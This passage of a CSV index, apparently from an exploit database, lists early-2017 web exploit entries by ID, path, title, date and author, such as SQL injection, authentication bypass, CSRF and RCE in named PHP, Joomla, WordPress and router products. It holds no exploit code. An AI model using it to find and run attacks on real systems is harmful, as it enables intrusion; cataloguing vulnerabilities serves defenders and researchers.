+41056,exploits/php/webapps/41056.txt,"Education Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",webapps,php, +41060,exploits/php/webapps/41060.txt,"9 Network Linkedin Clone Script - Improper Access Restrictions",2017-01-15,"Ihsan Sencan",webapps,php, +41058,exploits/php/webapps/41058.txt,"Professional Service Booking Script - SQL Injection",2017-01-13,"Ihsan Sencan",webapps,php, +41059,exploits/php/webapps/41059.txt,"Courier Business Website Script - Authentication Bypass",2017-01-13,"Ihsan Sencan",webapps,php, +41061,exploits/php/webapps/41061.txt,"Article Directory Script Seo 3.2 - Improper Access Restrictions",2017-01-15,"Ihsan Sencan",webapps,php, +41062,exploits/php/webapps/41062.txt,"e-Soft24 Jokes Portal Script Seo 1.3 - Authentication Bypass",2017-01-15,"Ihsan Sencan",webapps,php, +41063,exploits/php/webapps/41063.txt,"MC Smart Shop Script - SQL Injection",2017-01-15,"Ihsan Sencan",webapps,php, +41064,exploits/php/webapps/41064.txt,"MC Buy and Sell Cars Script 1.1 - SQL Injection",2017-01-15,"Ihsan Sencan",webapps,php, +41065,exploits/php/webapps/41065.txt,"MC Yellow Pages Script - SQL Injection",2017-01-15,"Ihsan Sencan",webapps,php, +41066,exploits/php/webapps/41066.txt,"MC Real Estate Pro Script - Improper Access Restrictions",2017-01-15,"Ihsan Sencan",webapps,php, +41067,exploits/php/webapps/41067.html,"MC Hosting Coupons Script - Cross-Site Request Forgery",2017-01-15,"Ihsan Sencan",webapps,php, +41068,exploits/php/webapps/41068.txt,"MC Inventory Manager Script - Multiple Vulnerabilities",2017-01-15,"Ihsan Sencan",webapps,php, +41070,exploits/php/webapps/41070.txt,"MC Coming Soon Script - Arbitrary File Upload / Improper Access Restrictions",2017-01-15,"Ihsan Sencan",webapps,php, +41071,exploits/php/webapps/41071.txt,"MC Documentation Creator Script - SQL Injection",2017-01-15,"Ihsan Sencan",webapps,php, +41074,exploits/hardware/webapps/41074.txt,"Huawei Flybox B660 - Cross-Site Request Forgery (2)",2017-01-12,Vulnerability-Lab,webapps,hardware, +41075,exploits/php/webapps/41075.txt,"Business Networking Script 8.11 - SQL Injection / Cross-Site Scripting",2017-01-16,"Ahmet Gurel",webapps,php, +41077,exploits/hardware/webapps/41077.sh,"Pirelli DRG A115 ADSL Router - Unauthenticated DNS Change",2017-01-16,"Todor Donev",webapps,hardware, +41078,exploits/hardware/webapps/41078.sh,"Tenda ADSL2/2+ Modem D840R - Unauthenticated DNS Change",2017-01-16,"Todor Donev",webapps,hardware, +41080,exploits/php/webapps/41080.txt,"Image Sharing Script 4.13 - Multiple Vulnerabilities",2017-01-16,"Hasan Emre Ozer",webapps,php, +41081,exploits/php/webapps/41081.txt,"Million Pixels 3 - Authentication Bypass",2017-01-16,"Ihsan Sencan",webapps,php, +41082,exploits/java/webapps/41082.txt,"ManagEnegine ADManager Plus 6.5.40 - Multiple Vulnerabilities",2017-01-08,"Mehmet Ince",webapps,java, +41083,exploits/php/webapps/41083.txt,"dirLIST 0.3.0 - Arbitrary File Upload",2017-01-17,hyp3rlinx,webapps,php, +41084,exploits/php/webapps/41084.txt,"BoZoN 2.4 - Remote Code Execution",2017-01-17,hyp3rlinx,webapps,php, +41086,exploits/aspx/webapps/41086.txt,"Check Box 2016 Q2 Survey - Multiple Vulnerabilities",2017-01-17,"Fady Mohammed Osman",webapps,aspx, +41087,exploits/php/webapps/41087.txt,"Openexpert 0.5.17 - 'area_id' SQL Injection",2017-01-17,"Nassim Asrir",webapps,php, +41091,exploits/php/webapps/41091.txt,"Medical Clinic Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41092,exploits/php/webapps/41092.txt,"Fileserve Clone Script - Authentication Bypass",2017-01-18,"Ihsan Sencan",webapps,php, +41093,exploits/php/webapps/41093.txt,"Auction Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41094,exploits/php/webapps/41094.txt,"Wetransfer Clone Script - Authentication Bypass",2017-01-18,"Ihsan Sencan",webapps,php, +41095,exploits/php/webapps/41095.txt,"Finance Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41096,exploits/php/webapps/41096.txt,"Justdial Clone Script - Authentication Bypass",2017-01-18,"Ihsan Sencan",webapps,php, +41097,exploits/php/webapps/41097.txt,"Business Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41098,exploits/php/webapps/41098.txt,"Buy and Sell Market Place Software - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41099,exploits/php/webapps/41099.txt,"Dentist Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41100,exploits/php/webapps/41100.txt,"Manufacturer Website Design Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41101,exploits/php/webapps/41101.txt,"Micro Blog Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41102,exploits/php/webapps/41102.txt,"My Private Tutor Website Builder Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41103,exploits/php/webapps/41103.txt,"NGO Directory Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41104,exploits/php/webapps/41104.txt,"Yoga and Fitness Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41105,exploits/php/webapps/41105.txt,"NGO Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41106,exploits/php/webapps/41106.txt,"Questions and Answers Script 1.1.3 - 'id' SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41107,exploits/php/webapps/41107.txt,"Online Mobile Recharge Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41108,exploits/php/webapps/41108.txt,"Clone of Oddee Script 1.1.3 - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41109,exploits/php/webapps/41109.txt,"Online Printing Business Clone Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41110,exploits/php/webapps/41110.txt,"Online Tshirt Design Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41111,exploits/php/webapps/41111.txt,"Shiksha Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41112,exploits/php/webapps/41112.txt,"Study Abroad Educational Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41113,exploits/php/webapps/41113.txt,"Courier Management System - SQL Injection",2017-01-17,"Sibusiso Sishi",webapps,php, +41114,exploits/php/webapps/41114.txt,"Flippa Website Script - SQL Injection",2017-01-18,"Ihsan Sencan",webapps,php, +41117,exploits/hardware/webapps/41117.sh,"Tenda ADSL2/2+ Modem D820R - Unauthenticated DNS Change",2017-01-19,"Todor Donev",webapps,hardware, +41116,exploits/php/webapps/41116.txt,"B2B Script 4.27 - SQL Injection",2017-01-18,"Dawid Morawski",webapps,php, +41118,exploits/hardware/webapps/41118.sh,"Pirelli DRG A115 v3 ADSL Router - Unauthenticated DNS Change",2017-01-19,"Todor Donev",webapps,hardware, +41119,exploits/php/webapps/41119.txt,"Viral Image & Video Sharing GagZone Script - SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, +41120,exploits/php/webapps/41120.txt,"Image and Video Script - SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, +41121,exploits/php/webapps/41121.txt,"Social News and Bookmarking Script - SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, +41122,exploits/php/webapps/41122.txt,"Viral Image Sharing Script - SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, +41123,exploits/php/webapps/41123.txt,"Vine VideoSite Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, +41124,exploits/php/webapps/41124.txt,"Job Vacancy Script - SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, +41125,exploits/php/webapps/41125.txt,"Home of Viral Images_ Videos and Articles Script - SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, +41126,exploits/php/webapps/41126.txt,"Video Site Creator Script - SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, +41127,exploits/php/webapps/41127.txt,"Classifieds Script - 'term' SQL Injection",2017-01-19,"Ihsan Sencan",webapps,php, +41131,exploits/php/webapps/41131.txt,"Complain Management System - SQL injection",2017-01-20,"Sibusiso Sishi",webapps,php, +41132,exploits/php/webapps/41132.txt,"ICGames-Games Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",webapps,php, +41133,exploits/php/webapps/41133.txt,"Domains Marketplace Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",webapps,php, +41134,exploits/php/webapps/41134.txt,"ICTutors Tutoring Site Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",webapps,php, +41135,exploits/php/webapps/41135.txt,"Mini Blog 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",webapps,php, +41136,exploits/php/webapps/41136.txt,"Job Site PHP Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",webapps,php, +41137,exploits/php/webapps/41137.txt,"Music Site Script 1.2 - Authentication Bypass",2017-01-20,"Ihsan Sencan",webapps,php, +41138,exploits/php/webapps/41138.txt,"Affiliate Tracking Script 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",webapps,php, +41139,exploits/php/webapps/41139.txt,"Mini CMS 1.1 - Authentication Bypass",2017-01-20,"Ihsan Sencan",webapps,php, +41140,exploits/php/webapps/41140.txt,"B2B Alibaba Clone Script - 'IndustryID' SQL Injection",2017-01-20,"Ihsan Sencan",webapps,php, +41141,exploits/linux/webapps/41141.txt,"NTOPNG 2.4 Web Interface - Cross-Site Request Forgery",2017-01-22,hyp3rlinx,webapps,linux, +41143,exploits/php/webapps/41143.rb,"PageKit 1.0.10 - Password Reset",2017-01-21,"Saurabh Banawar",webapps,php, +41147,exploits/hardware/webapps/41147.txt,"WD My Cloud Mirror 2.11.153 - Authentication Bypass / Remote Code Execution",2017-01-24,"Kacper Szurek",webapps,hardware, +41150,exploits/php/webapps/41150.txt,"MyBB < 1.8.3 (with PHP 5.6 < 5.6.11) - Remote Code Execution",2017-01-20,"Taoguang Chen",webapps,php,80 +41155,exploits/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",webapps,php, +41156,exploits/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",webapps,php, +41157,exploits/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",webapps,php, +41159,exploits/php/webapps/41159.txt,"PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,webapps,php, +41166,exploits/php/webapps/41166.txt,"KB Affiliate Referral Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",webapps,php, +41167,exploits/php/webapps/41167.txt,"KB Login Authentication Script 1.1 - Authentication Bypass",2017-01-26,"Ihsan Sencan",webapps,php, +41168,exploits/php/webapps/41168.txt,"KB Messages PHP Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",webapps,php, +41169,exploits/php/webapps/41169.txt,"Web Based TimeSheet Script - Authentication Bypass",2017-01-26,"Ihsan Sencan",webapps,php, +41170,exploits/hardware/webapps/41170.txt,"TM RG4332 Wireless Router - Arbitrary File Disclosure",2017-01-26,"Saeid Atabaki",webapps,hardware, +41172,exploits/php/webapps/41172.txt,"PHPBack < 1.3.1 - SQL Injection / Cross-Site Scripting",2017-01-26,"Manish Tanwar",webapps,php, +41175,exploits/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",webapps,hardware, +41177,exploits/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",webapps,php, +41178,exploits/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",webapps,php, +41179,exploits/cgi/webapps/41179.txt,"Radisys MRF - Command Injection",2017-01-27,"Filippos Mastrogiannis",webapps,cgi, +41180,exploits/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection (2)",2017-01-27,"Lenon Leite",webapps,php, +41181,exploits/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",webapps,php, +41182,exploits/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",webapps,php, +41184,exploits/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,webapps,php, +41185,exploits/php/webapps/41185.txt,"PHP PEAR 1.10.1 - Arbitrary File Download",2017-01-30,hyp3rlinx,webapps,php, +41186,exploits/php/webapps/41186.txt,"Caregiver Script 2.57 - SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, +41187,exploits/php/webapps/41187.txt,"Itech Auction Script 6.49 - 'mcid' SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, +41188,exploits/php/webapps/41188.txt,"Itech B2B Script 4.28 - SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, +41189,exploits/php/webapps/41189.txt,"Itech Classifieds Script 7.27 - 'scat' SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, +41190,exploits/php/webapps/41190.txt,"Itech Dating Script 3.26 - SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, +41191,exploits/php/webapps/41191.txt,"Itech Freelancer Script 5.13 - SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, +41193,exploits/php/webapps/41193.txt,"Itech Multi Vendor Script 6.49 - 'pl' SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, +41194,exploits/php/webapps/41194.txt,"Itech News Portal Script 6.28 - 'inf' SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, +41195,exploits/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, +41197,exploits/php/webapps/41197.txt,"PHP Product Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",webapps,php, +41198,exploits/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",webapps,php, +41199,exploits/php/webapps/41199.txt,"Itech Video Sharing Script 4.94 - 'v' SQL Injection",2017-01-30,"Kaan KAMIS",webapps,php, +41200,exploits/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",webapps,php, +41205,exploits/hardware/webapps/41205.py,"NETGEAR Routers - Password Disclosure",2017-01-30,"Trustwave's SpiderLabs",webapps,hardware, +41201,exploits/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, +41202,exploits/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, +41203,exploits/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, +41204,exploits/php/webapps/41204.txt,"Itech Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Ihsan Sencan",webapps,php, +41208,exploits/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",webapps,hardware, +41209,exploits/php/webapps/41209.txt,"Joomla! Component JTAG Calendar 6.2.4 - 'search' SQL Injection",2017-01-28,"Persian Hack Team",webapps,php, +41210,exploits/php/webapps/41210.txt,"LogoStore - 'query' SQL Injection",2017-02-01,"Kaan KAMIS",webapps,php, +41223,exploits/linux/webapps/41223.py,"WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Python)",2017-02-02,leonjza,webapps,linux, +41224,exploits/linux/webapps/41224.rb,"WordPress 4.7.0/4.7.1 - Unauthenticated Content Injection (Ruby)",2017-02-02,"Harsh Jaiswal",webapps,linux, +41231,exploits/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php, +41225,exploits/php/webapps/41225.txt,"Property Listing Script - 'propid' Blind SQL Injection",2017-02-02,"Kaan KAMIS",webapps,php, +41226,exploits/php/webapps/41226.txt,"Itech Inventory Management Software 3.77 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php, +41230,exploits/php/webapps/41230.txt,"Itech Movie Portal Script 7.37 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php, +41228,exploits/php/webapps/41228.txt,"Itech News Portal Script 6.28 - 'sc' SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php, +41229,exploits/php/webapps/41229.txt,"Itech Auction Script 6.49 - 'pid' SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php, +41235,exploits/php/webapps/41235.txt,"SlimarUSER Management 1.0 - 'id' SQL Injection",2017-02-03,"Kaan KAMIS",webapps,php, +41238,exploits/php/webapps/41238.txt,"Itech Multi Vendor Script 6.49 - SQL Injection",2017-02-03,Th3GundY,webapps,php, +41239,exploits/php/webapps/41239.txt,"Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery",2017-02-03,"Tim Herres",webapps,php,80 +41241,exploits/php/webapps/41241.txt,"Alstrasoft EPay Enterprise 5.17 - SQL Injection",2017-02-04,"Ihsan Sencan",webapps,php, +41242,exploits/php/webapps/41242.txt,"Alstrasoft ProTaxi Enterprise 3.5 - Arbitrary File Upload",2017-02-04,"Ihsan Sencan",webapps,php, +41243,exploits/php/webapps/41243.txt,"Alstrasoft e-Friends 5.12 - SQL Injection",2017-02-04,"Ihsan Sencan",webapps,php, +41244,exploits/php/webapps/41244.txt,"Alstrasoft Video Share Enterprise 4.72 - SQL Injection",2017-02-04,"Ihsan Sencan",webapps,php, +41245,exploits/php/webapps/41245.html,"Alstrasoft Flippa Clone MarketPlace Script 4.10 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",webapps,php, +41246,exploits/php/webapps/41246.html,"Alstrasoft FMyLife Pro 1.02 - Cross-Site Request Forgery (Add Admin)",2017-02-04,"Ihsan Sencan",webapps,php, +41247,exploits/php/webapps/41247.txt,"Alstrasoft Forum Pay Per Post Exchange Script 2.01 - SQL Injection",2017-02-04,"Ihsan Sencan",webapps,php, +41249,exploits/php/webapps/41249.pl,"Alstrasoft Template Seller Pro 3.25e - 'tempid' SQL Injection",2017-02-04,"Ihsan Sencan",webapps,php, +41250,exploits/php/webapps/41250.txt,"Itech Job Portal Script 9.13 - Multiple Vulnerabilities",2017-02-04,Th3GundY,webapps,php, +41251,exploits/php/webapps/41251.txt,"iScripts AutoHoster 3.0 - 'siteid' SQL Injection",2017-02-04,"Ihsan Sencan",webapps,php, +41252,exploits/php/webapps/41252.txt,"iScripts EasyCreate 3.2 - 'siteid' SQL Injection",2017-02-04,"Ihsan Sencan",webapps,php, +41253,exploits/php/webapps/41253.txt,"ThisIsWhyImBroke Clone Script 4.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php, +41254,exploits/php/webapps/41254.txt,"Upworthy Clone Script 1.1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php, +41255,exploits/php/webapps/41255.txt,"Ultimate Viral Media Script 1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php, +41256,exploits/php/webapps/41256.txt,"Visual Link Sharing Websites Builder Script 2.1.0 - SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php, +41266,exploits/php/webapps/41266.txt,"Fully Featured News CMS 1.0 - 'id' SQL Injection",2017-02-07,"Ihsan Sencan",webapps,php, +41267,exploits/php/webapps/41267.txt,"MySQL File Uploader 1.0 - 'id' SQL Injection",2017-02-07,"Ihsan Sencan",webapps,php, +41258,exploits/php/webapps/41258.txt,"Funny Image and Video Script 2.0.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php, +41259,exploits/php/webapps/41259.txt,"Clone Script Directory Script 1.1.0 - 'cid' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php, +41260,exploits/php/webapps/41260.txt,"Viral Pictures and Video Script 2.0.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php, +41261,exploits/php/webapps/41261.txt,"NewsBee CMS - SQL Injection",2017-02-06,"Kaan KAMIS",webapps,php, +41262,exploits/php/webapps/41262.txt,"Web Inspiration Gallery Script 1.0.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php, +41263,exploits/php/webapps/41263.txt,"Viral Fun Facts Sharing Script 1.1.0 - 'id' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php, +41264,exploits/php/webapps/41264.txt,"Questions and Answers Script 2.0.0 - 'cid' SQL Injection",2017-02-06,"Ihsan Sencan",webapps,php, +41268,exploits/php/webapps/41268.txt,"Easy Support Tools 1.0 - 'stt' SQL Injection",2017-02-07,"Ihsan Sencan",webapps,php, +41269,exploits/php/webapps/41269.txt,"Easy Web Search 3 - 'id' SQL Injection",2017-02-07,"Ihsan Sencan",webapps,php, +41270,exploits/php/webapps/41270.txt,"FTP Made Easy PRO 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",webapps,php, +41271,exploits/php/webapps/41271.txt,"Easy File Uploader 1.2 - Arbitrary File Download",2017-02-07,"Ihsan Sencan",webapps,php, +41272,exploits/php/webapps/41272.txt,"Responsive Filemanger <= 9.11.0 - Arbitrary File Disclosure",2017-02-07,"Wiswat Aswamenakul",webapps,php, +41279,exploits/php/webapps/41279.txt,"Muviko Video CMS - SQL Injection",2017-02-08,"Ihsan Sencan",webapps,php, +41280,exploits/php/webapps/41280.txt,"Multi Outlets POS 3.1 - 'id' SQL Injection",2017-02-08,"Ihsan Sencan",webapps,php, +41283,exploits/php/webapps/41283.txt,"Mobiketa 3.5 - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php, +41284,exploits/php/webapps/41284.txt,"Sendroid 5.2 - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php, +41285,exploits/php/webapps/41285.txt,"Fome SMS Portal 2.0 - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php, +41286,exploits/php/webapps/41286.txt,"SOA School Management - 'view' SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php, +41287,exploits/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php, +41288,exploits/php/webapps/41288.txt,"EXAMPLO - SQL Injection",2017-02-09,"Ihsan Sencan",webapps,php, +41290,exploits/php/webapps/41290.txt,"CMS Lite 1.3.1 - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41291,exploits/php/webapps/41291.txt,"Tiger Post 3.0.1 - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41292,exploits/php/webapps/41292.txt,"Gram Post 1.0 - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41293,exploits/php/webapps/41293.txt,"Youtube Analytics Multi Channel 3.0 - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41294,exploits/php/webapps/41294.txt,"Collabo - Arbitrary File Download",2017-02-10,"Ihsan Sencan",webapps,php, +41295,exploits/php/webapps/41295.txt,"Takas Classified 1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41296,exploits/php/webapps/41296.txt,"Zigaform - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41300,exploits/php/webapps/41300.txt,"Multilanguage Estate Agency Pro 1.2 - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41301,exploits/php/webapps/41301.txt,"QWIKIA 1.1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41302,exploits/php/webapps/41302.txt,"Automated Job Portal Script - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41303,exploits/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41304,exploits/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41305,exploits/php/webapps/41305.txt,"CodePaul ClipMass - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41306,exploits/php/webapps/41306.txt,"Video Subscription - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41299,exploits/hardware/webapps/41299.html,"D-Link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",webapps,hardware, +41307,exploits/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",webapps,php, +41308,exploits/php/webapps/41308.txt,"WordPress Plugin Insert PHP 3.3.1 - PHP Code Injection",2017-02-09,CrashBandicot,webapps,php, +41309,exploits/windows/webapps/41309.html,"SonicDICOM PACS 2.3.2 - Cross-Site Scripting",2017-02-11,LiquidWorm,webapps,windows, +41310,exploits/windows/webapps/41310.html,"SonicDICOM PACS 2.3.2 - Cross-Site Request Forgery (Add Admin)",2017-02-11,LiquidWorm,webapps,windows, +41311,exploits/windows/webapps/41311.txt,"SonicDICOM PACS 2.3.2 - Privilege Escalation",2017-02-11,LiquidWorm,webapps,windows, +41312,exploits/linux/webapps/41312.txt,"Kodi 17.1 - Arbitrary File Disclosure",2017-02-12,"Eric Flokstra",webapps,linux, +41328,exploits/php/webapps/41328.txt,"Joomla! Component Soccer Bet 4.1.5 - 'userid' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php, +41313,exploits/php/webapps/41313.txt,"WhizBiz 1.9 - SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php, +41314,exploits/php/webapps/41314.txt,"TI Online Examination System 2.0 - SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php, +41315,exploits/php/webapps/41315.txt,"Viavi Real Estate - SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php, +41316,exploits/php/webapps/41316.txt,"Viavi Movie Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php, +41317,exploits/php/webapps/41317.txt,"Viavi Product Review - 'id' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php, +41318,exploits/php/webapps/41318.txt,"Quadz School Management System 3.1 - 'uisd' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php, +41319,exploits/php/webapps/41319.txt,"Domains & Hostings Manager PRO 3.0 - 'entries' SQL Injection",2017-02-12,"Ihsan Sencan",webapps,php, +41322,exploits/php/webapps/41322.txt,"Joomla! Component onisPetitions 2.5 - 'tag' SQL Injection",2017-02-11,"Persian Hack Team",webapps,php, +41323,exploits/php/webapps/41323.txt,"Joomla! Component onisQuotes 2.5 - 'tag' SQL Injection",2017-02-11,"Persian Hack Team",webapps,php, +41324,exploits/php/webapps/41324.txt,"Joomla! Component onisMusic 2 - 'tag' SQL Injection",2017-02-11,"Persian Hack Team",webapps,php, +41325,exploits/php/webapps/41325.txt,"Joomla! Component Sponsor Wall 7.0 - 'wallid' SQL Injection",2017-02-11,"Persian Hack Team",webapps,php, +41326,exploits/php/webapps/41326.txt,"Joomla! Component Vik Booking 1.7 - SQL Injection",2017-02-11,"Persian Hack Team",webapps,php, +41327,exploits/php/webapps/41327.txt,"Joomla! Component Soccer Bet 4.1.5 - 'cat' SQL Injection",2017-02-11,"Persian Hack Team",webapps,php, +41329,exploits/php/webapps/41329.txt,"PHP Marketplace Script - SQL Injection",2017-02-13,Th3GundY,webapps,php, +41330,exploits/php/webapps/41330.txt,"Joomla! Component JE Classify Ads 1.2 - 'pro_id' SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41331,exploits/php/webapps/41331.txt,"Joomla! Component JE Gallery 1.3 - 'photo_id' SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41332,exploits/php/webapps/41332.txt,"Joomla! Component JE Directory 1.7 - 'ditemid' SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41333,exploits/php/webapps/41333.txt,"Joomla! Component JE QuoteForm - 'Itemid' SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41334,exploits/php/webapps/41334.txt,"Joomla! Component JE Property Finder 1.6.3 - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41335,exploits/php/webapps/41335.txt,"Joomla! Component JE Tour 2.0 - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41336,exploits/php/webapps/41336.txt,"Joomla! Component JE Video Rate 1.0 - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41337,exploits/php/webapps/41337.txt,"Joomla! Component JE auction 1.6 - 'eid' SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41338,exploits/php/webapps/41338.txt,"Joomla! Component JE Auto 1.5 - 'd_itemid' SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41339,exploits/php/webapps/41339.txt,"Joomla! Component JE Awd Song 1.8 - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41340,exploits/php/webapps/41340.txt,"Joomla! Component Hbooking 1.9.9 - 'h_id' SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41341,exploits/php/webapps/41341.txt,"Joomla! Component JE Quiz 2.3 - SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41342,exploits/php/webapps/41342.txt,"Joomla! Component JE Grid Folio - 'id' SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41343,exploits/php/webapps/41343.txt,"Joomla! Component JE K2 Multiple Form Story 1.3 - 'Itemid' SQL Injection",2017-02-13,"Ihsan Sencan",webapps,php, +41344,exploits/php/webapps/41344.txt,"Joomla! Component JE Form Creator 1.8 - 'Itemid' SQL Injection",2017-02-13,"Ihsan 